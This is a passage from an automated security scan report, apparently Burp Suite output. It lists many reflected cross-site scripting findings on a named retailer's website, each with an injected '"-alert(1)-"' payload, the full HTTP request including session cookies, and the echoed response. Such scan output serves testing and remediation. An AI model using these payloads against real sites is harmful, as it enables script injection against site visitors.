Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cmprdodont2kar3gf3rj1dhch7; expires=Tue, 09-Nov-2010 17:13:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/");
//]]>
...[SNIP]...

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a978"-alert(1)-"606c1d68e0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m979oncrcran81j6ldggdbvt02; expires=Tue, 09-Nov-2010 17:13:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/");
//]]>
...[SNIP]...

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1ac"-alert(1)-"94d6c0bb51d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n84oeqtbtkaimngalbhdh4b7p2; expires=Tue, 09-Nov-2010 17:12:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1");
//]]>
...[SNIP]...

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822b3"-alert(1)-"b20e2f3dc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t043khjde91qdmtguotmk6cul5; expires=Tue, 09-Nov-2010 17:12:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/");
//]]>
...[SNIP]...

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 341fe"-alert(1)-"31db44bf19f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ea8jb9ed3q44qqk7655vn8uep3; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/");
//]]>
...[SNIP]...

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3995f"-alert(1)-"a3952493b7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=p1bt0tf99spp6ed3hjnti3frl5; expires=Tue, 09-Nov-2010 17:13:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/");
//]]>
...[SNIP]...

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b150e"-alert(1)-"33d8408daf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=naj9ms4mjpgu0e5lfjm5nos3h3; expires=Tue, 09-Nov-2010 17:10:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1");
//]]>
...[SNIP]...

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21cc"-alert(1)-"0ce157bdad7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jkc6rurokln17h26i69cb11qs6; expires=Tue, 09-Nov-2010 17:14:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/");
//]]>
...[SNIP]...

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a6f"-alert(1)-"250afec6fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=facdjjolf3cmv5erkbtf895pi0; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/");
//]]>
...[SNIP]...

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c44"-alert(1)-"e4a400a0921 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=53vnpl842au915dr6l8pe40j37; expires=Tue, 09-Nov-2010 17:15:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/");
//]]>
...[SNIP]...

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"-alert(1)-"864ea334664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1rvit536klng9drge2lou592o2; expires=Tue, 09-Nov-2010 17:12:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1");
//]]>
...[SNIP]...

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f13"-alert(1)-"e0e423b9710 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc5f13"-alert(1)-"e0e423b9710/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oc7q2ucdi300denj3g419cgq85; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc5f13"-alert(1)-"e0e423b9710/women/");
//]]>
...[SNIP]...

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e892d"-alert(1)-"71a594f2ca6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womene892d"-alert(1)-"71a594f2ca6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0j2alplcamddjnc4l2grtunqm1; expires=Tue, 09-Nov-2010 17:13:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womene892d"-alert(1)-"71a594f2ca6/");
//]]>
...[SNIP]...

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58d36"-alert(1)-"7c51ba12963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gcvi3fem1mhrbria50s6acuvk1; expires=Tue, 09-Nov-2010 17:12:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1");
//]]>
...[SNIP]...

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
